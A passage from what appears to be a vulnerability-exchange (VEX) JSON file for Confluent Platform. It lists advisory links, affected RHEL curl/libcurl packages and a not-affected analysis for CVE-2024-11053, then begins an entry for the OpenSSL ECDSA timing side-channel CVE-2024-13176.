        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1671"
        },
        {
          "url": "https://github.com/advisories/GHSA-h288-5fq8-5pfw"
        },
        {
          "url": "https://hackerone.com/reports/2829063"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-11053.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11053"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7162-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-11053"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2025.html#AppendixMSQL"
        }
      ],
      "published": "2024-12-11T08:15:05+00:00",
      "updated": "2026-06-17T06:56:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-13176",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        385
      ],
      "description": "Issue summary: A timing side-channel which could potentially allow recovering\nthe private key exists in the ECDSA signature computation.\n\nImpact summary: A timing side-channel in ECDSA signature computations\ncould allow recovering the private key by an attacker. However, measuring\nthe timing would require either local access to the signing application or\na very fast network connection with low latency.\n\nThere is a timing signal of around 300 nanoseconds when the top word of\nthe inverted ECDSA nonce value is zero. This can happen with significant\nprobability only for some of the supported elliptic curves. In particular\nthe NIST P-521 curve is affected. To be able to measure this leak, the attacker\nprocess must either be located in the same physical computer or must\nhave a very fast network connection with low latency. For that reason\nthe severity of this vulnerability is Low.\n\nThe FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-13176"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/01/20/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:15699"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-13176"
        },
        {
          "url": "https://bugzilla.redhat.com/2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/2380335"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338999"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380306"
        },
        {
